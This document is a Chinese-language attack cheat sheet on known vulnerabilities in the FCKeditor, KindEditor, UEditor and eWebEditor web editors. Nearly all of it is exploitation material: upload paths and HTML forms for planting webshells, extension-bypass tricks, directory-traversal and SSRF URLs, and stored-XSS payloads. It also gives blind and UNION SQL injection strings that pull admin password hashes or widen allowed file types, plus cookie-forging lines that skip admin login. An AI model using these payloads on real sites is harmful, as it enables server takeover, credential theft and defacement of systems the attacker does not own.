編輯器漏洞合
Fckeditor編輯器漏洞集合
查看版本與文件上傳地址
1.查看編輯器版本 fckeditor/_whatsnew.html
2.常用上傳地址
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php
3.FCKeditor中test 文件的上傳地址
FCKeditor/editor/filemanager/browser/default/connectors/test.htmlFCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.htmlFCKeditor/editor/filemanager/connectors/uploadtest.html
4.其他上傳地址
FCKeditor/_samples/default.htmlFCKeditor/_samples/asp/sample01.aspFCKeditor/_samples/asp/sample02.aspFCKeditor/_samples/asp/sample03.aspFCKeditor/_samples/asp/sample04.asp
一般很多站點都已刪除_samples 目錄,可以試試。
FCKeditor/editor/fckeditor.html 不可以上傳文件,可以點擊上傳圖片按鈕再選擇瀏覽服務器即可跳轉至可上傳文件頁。
漏洞(一):任意文件上傳
----------------------------------------
版本:php < =2.4.2
在處理PHP 上傳的地方並未對Media 類型進行上傳文件類型的控制,導致用戶上傳任意文件!
<formid=”frmUpload” enctype=”multipart/form-data”action=”http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media”method=”post”>Upload a new file:<br><input type=”file” name=”NewFile” size=”50″><br><input id=”btnUpload” type=”submit” value=”Upload”></form>
漏洞(二):任意文件上傳
----------------------------------------
1.驗證:FCKeditor 文件上傳“.”變“_”下划線的繞過方法,很多時候上傳的文件例如:shell.php.rar 或shell.php;.jpg 會變為shell_php;.jpg 這是新版FCK 的變化。
2.繞過:提交shell.php+空格繞過不過空格只支持win 系統 linu 是不支持的
[shell.php和shell.php+空格是2 個不同的文件 未測試。繼續上傳同名文件可變為shell.php;(1).jpg 也可以新建一個文件夾,只檢測了第一級的目錄,如果跳到二級目錄就不受限制
漏洞(三):列目錄
----------------------------------------
影響版本:<= 2.4.1
1.修改CurrentFolder 參數使用 ../../來進入不同的目錄
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
2.根據返回的XML 信息可以查看網站所有的目錄。
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
也可以直接瀏覽盤符:
JSP 版本:
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
漏洞(四):爆路徑漏洞
----------------------------------------
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
漏洞(五):突破建立文件夾
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
漏洞(六):****FCKeditor 被動限制策略所導致的過濾不嚴問題
----------------------------------------
影響版本: FCKeditor x.x <=FCKeditor v2.4.3
FCKeditor v2.4.3 中File 類別默認拒絕上傳類型:
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
Fckeditor 2.0 <= 2.2
允許上傳asa、cer、php2、php4、inc、pwml、pht 后綴的文件
上傳后它保存的文件直接
用的$sFilePath = $sServerDir . $sFileName
而在apache 下
因為”Apache 文件名解析缺陷漏洞”也可以利用之,另建議其他上傳漏洞中定義TYPE 變量時使用File 類別來上傳文件,根據FCKeditor 的代碼,其限制最為狹隘。
在上傳時遇見可直接上傳腳本文件固然很好,但有些版本可能無法直接上傳可以利用在文件名后面加.點或空格繞過,也可以利用2003 解析漏洞建立xxx.asp文件夾或者上傳xx.asp;.jpg!
漏洞(六):jsp任意上傳
----------------------------------------
/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
kindeditor編輯器漏洞集合
漏洞(一):任意文件上傳(html)文件漏洞
----------------------------------------
影響版本如下:kindeditor版本<=4.1.11
上傳路徑如下
kindeditor/asp/upload_json.asp?dir=filekindeditor/asp.net/upload_json.ashx?dir=filekindeditor/jsp/upload_json.jsp?dir=filekindeditor/php/upload_json.php?dir=file
修改content-type:text/plain 文件名為 html后綴即可
漏洞(二):上傳文件漏洞
----------------------------------------
影響版本:KindEditor 3.5.2~4.1
1.打開編輯器,將一句話改名為1.jpg 上傳圖片,打開文件管理,進入“down”目錄,跳至尾頁,最后一個圖片既是我們上傳的一句話
2.打開谷歌瀏覽器的 審查元素
jpg修改asp
漏洞(三):上傳解析漏洞
----------------------------------------
影響版本:<= kindeditor 3.2.1(09年8月份發布的最新版)
利用iis6.0 解析漏洞
漏洞(四):列目錄漏洞
----------------------------------------
版本:KindEditor 3.4.2 KindEditor 3.5.5
訪問 可以爆出絕對路徑
http://domain/67cms/kindeditor/php/file_manager_json.php?path=/
爆出絕對路徑
D:AppServ/www67cms/kindeditor/php/file_manager_json.php
http://domain/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
這時將遍歷d:/AppServ/www/67cms/下的所有文件和文件名
百度Ueditor編輯器漏洞集合
漏洞(一):net.版本1.4.3文件上傳
http://domain/controller.ashx?action=catchimage 參數為catchimage,
case:”catchimage”,這里會實例化類,在具體實現文件上傳的類的方法里只驗證了content-type類型
<form action="http://xx.com/ueditor/net/controller.ashx?action=catchimage" enctype="multipart/form-data" method="POST"><p>shell addr: <input type="text" name="source[]" /></p><input type="submit" value="Submit" /></form>
需准備一個圖片馬兒,遠程shell地址需要指定擴展名為 1.gif?.aspx
遠程抓圖片然后使用?.aspx 作為后輟,因為后輟是通過截斷 . 來獲取的后端驗證方式是ContentType圖片默認的格式就是image/jpeg
漏洞(二):****XML文件上傳導致存儲型XSS
----------------------------------------
上傳路徑如下
/ueditor/index.html/ueditor/asp/controller.asp?action=uploadimage/ueditor/asp/controller.asp?action=uploadfile/ueditor/net/controller.ashx?action=uploadimage/ueditor/net/controller.ashx?action=uploadfile/ueditor/php/controller.php?action=uploadfile/ueditor/php/controller.php?action=uploadimage/ueditor/jsp/controller.jsp?action=uploadfile/ueditor/jsp/controller.jsp?action=uploadimage
1,點擊上傳
上傳內容如下
<html><head></head><body><something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1);</something:script></body></html>
2,buprsuit抓包攔截
3,將uploadimage類型改為uploadfile,此時進方法為uploadfile,執行文件上傳的操作,並修改文件后綴名為xml,最后復制上xml代碼即可
4,訪問listfile方法,http://domain/ueditor/php/controller.php?action=listfile即可查看文件的返回路徑
5,訪問上傳的url文件,觸發payload
漏洞(三):SSRF漏洞
----------------------------------------
1.該漏洞存在於1.4.3的jsp版本中。但1.4.3.1版本已經修復了該漏洞。
已知該版本ueditor的ssrf觸發點:
/jsp/controller.jsp?action=catchimage&source[]=/jsp/getRemoteImage.jsp?upfile=/php/controller.php?action=catchimage&source[]=
2.構造poc
http://domain/cmd/ueditor/jsp/controller.jsp?action=catchimage&source[]=https://domain/filename
漏洞(四):上傳存儲型xss漏洞
----------------------------------------
1,沒有過濾iframe
poc 如下
2,1.4.3版本
任意編輯內容,burp抓包替換如下即可
%3Cp%3E1111111"><ImG sRc=1 OnErRoR=prompt(1)>%3Cbr%2F%3E%3C%2Fp%3E
ewebeditor編輯器漏洞集合
0x01 ewebeditor 編輯器 漏洞集
漏洞(一):關鍵路徑(弱口令)
------------------------------------------
弱口令原理:弱口令(weak password) 沒有嚴格和准確的定義,通常認為容易被別人(他們有可能對你很了解)猜測到或被破解工具破解的口令均為弱口令。弱口令指的是僅包含簡單數字和字母的口令或簡單的數字字母組合,例如“123456”、“admin”、“admin123”等,因為這樣的口令很容易被別人破解,從而使用戶的互聯網賬號受到他人控制,因此不推薦用戶使用
關鍵路徑:
Admin_Login.asp 登錄頁面
Admin_Default.asp 管理首頁
Admin_Style.asp 樣式頁面
Admin_UploadFile.asp 上傳文件頁面
Upload.asp 上傳文件業
Admin_ModiPwd.asp 密碼
eWebEditor.asp 數據庫文件
/db/ewebeditor.mdb 默認數據庫路徑
ewebeditor 2.8.0版本以前為默認后台 路徑 :
ewebeditor/admin_login.asp
以后版本默認后台 路徑:
admin/login.asp,或admin/editor/login_admin.asp
漏洞(二):****數據庫路徑泄露
----------------------------------------
若后台使用默認username和password無法登錄。
可以試試直接下載../db/ewebeditor.mdb 或者../db/ewebeditor.asp,
username和password在eWebEditor_System表中,經過了md5加密
漏洞(三):****目錄遍歷漏洞
----------------------------------------
目錄遍歷 : 原理比較簡單,就是程序在實現上沒有充分過濾用戶輸入的../之類的目錄跳轉符,導致惡意用戶可以在url處通過目錄跳轉來遍歷服務器上的任意文件。這里的目錄跳轉符可以是../,也可是../的ASCII編碼或者是unicode編碼等
1,選擇上傳文件管理,隨意選擇一個目錄,輸入路徑:dir=..,可見
http://domain/eweb/admin_uploadfile.asp?id=14&dir=../../../../data
目錄下的文件
2,url如下
http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=…././/..
漏洞(四):文件上傳****漏洞
----------------------------------------
文件上傳漏洞原理:在有上傳功能的系統中,如果應用程序沒有對用戶上傳的文件做嚴格的校驗,那么可能會導致用戶上傳腳本文件,然后用戶再通過shell管理工具連接這些文件,來達到執行該腳本文件,從而控制服務器的目的。
常見驗證方式:
(1)驗證文件后綴.
黑名單驗證即禁止指定的文件類型上傳
(html | htm | php | php2 | hph3 | php4 | php5 | asp | aspx | ascx | jsp| cfm | bat | exe | com | dll | vbs | js | reg | cgi | htaccess | asis | sh)
白名單驗證:僅允許指定的文件類型上傳,比如僅允許上傳jpg | gif | doc | pdf等類型的文件,其他文件全部禁止。
(2)驗證content-type
如image/png 等等
(3)驗證文件內容
驗證文件中的危險函數如命令執行函數eval(),system(),可以自己寫或找團隊師傅找可繞過的木馬文件
編輯圖片樣式管理,在圖片類型那里添加asp允許上傳asp的腳本文件,然后上傳1.asp 即可
點擊預覽,上傳圖片,然后上傳1.asp 即可
右鍵在新標簽頁打開圖片,即可找到圖片地址
漏洞(五):SQL注入****漏洞
----------------------------------------
注:默認表名:eWebEditor_System
默認列名:sys_UserName、sys_UserPass
1.ewebeditor 以前版本都存在注入
domain/ewebeditor/ewebeditor.asp?id=article_content&style=Full_v200
2.2.7以下的版本注入
domain/eWebEditor/eWebEditor.asp?id=14&style=standard
3.ewebeditor v2.1.6存在注入可以用union select添加上傳后綴進行上傳!
<form action="http://www.xxx.com/ewebeditor/upload.asp?action=save&type=IMAGE&style=standard'union selectS_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt,[S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=postname=myform enctype="multipart/form-data">
<input type=file name=upload filesize=100><br><br>
<input type=submit value=Fuck>
</form></form>
修改紅色部分的路徑,然后自動上傳 .cer 文件!漏洞原因是因為sStyleName變量直接從style中讀取,並沒有過濾,所以可以包含任意字符!用select在ewebeditor_style表中查找s_name為sStyleName的記錄,找不到就提示出錯!在sStyleName變量中用union來構造記錄,我們可以在sAllowExt中加入"|cer"、"|asa"等!
4.ewebeditor的upload.asp文件存在注入漏洞
ewebeditor/Upload.asp?type=FILE&style=standard_coolblue1'and%20(select%20top%201%20asc(mid(sys_userpass,15,1))%20from%20ewebeditor_system%20)>98%20and%20'1'='1
漏洞(六):****session欺騙
----------------------------------------
asp版ewebeditor相關版本(5)
適用於一些設置不當的虛擬主機。當旁注得到一個webshell,而目標站存在ewebeditor卻不能找到密碼的時候可以嘗試欺騙進入后台!
新建一個.asp文件,內容如下:<%Session("eWebEditor_User") = "123132323"%> 然后訪問這個文件,再訪問ewebeditor/admin_default.asp!欺騙進入后台!不過很老了!
php版ewebeditor 3.8
php版本后台是調用../ewebeditor/admin/config.php 文件
1,找到登陸后台
進入后台后隨便輸入一個用戶和密碼 必須是出錯的時候,
然后這時候你清空瀏覽器的url,然后輸入
javascript:alert(document.cookie=”adminuser=”+escape(”admin”));javascript:alert(document.cookie=”adminpass=”+escape(”admin”));javascript:alert(document.cookie=”admindj=”+escape(”1″));
后三次回車,
2 然后輸入正常情況才能訪問的文件../ewebeditor/admin/default.php就可以進后台了
漏洞(七):****后台跳過認證漏洞
----------------------------------------
1.訪問后台登陸頁面!隨便輸入帳號密碼,返回錯誤!
2.然后清空瀏覽器在地址欄輸入
javascript:alert(document.cookie="adminuser="+escape("admin"));//document.cookie設置cookie的值,adminuser(cookie名)=escape("admin")(cookie值用escape函數進行url編碼)javascript:alert(document.cookie="adminpass="+escape("admin"));javascript:alert(document.cookie="admindj="+escape("1"));
3.然后再清空地址欄,在路徑里輸入后台登陸后的頁面,比如: admin_default.asp admin/default.asp 等。
漏洞(八):****利用遠程上傳功能
----------------------------------------
1.打開編輯頁面,然后圖片,選擇輸入url 比如:http://site.com/1.gif.asp! 然后選擇上傳遠程文件!自動就把1.gif.asp 保存在上傳目錄內!(利用上面說的遠程上傳的方式!可以得到webshell!成功率取決於,虛擬主機的安全設置!)太老
漏洞(九):任意文件刪除
----------------------------------------
此漏洞存在於Example\NewsSystem目錄下的delete.asp文件中
http://www.XXXXX.com/editor/example/newssystem/delete.asp?id=[id]
有幾個版本的ewebeditor上傳類型是在security.asp文件控制的!直接刪除該文件可以上傳任意webshell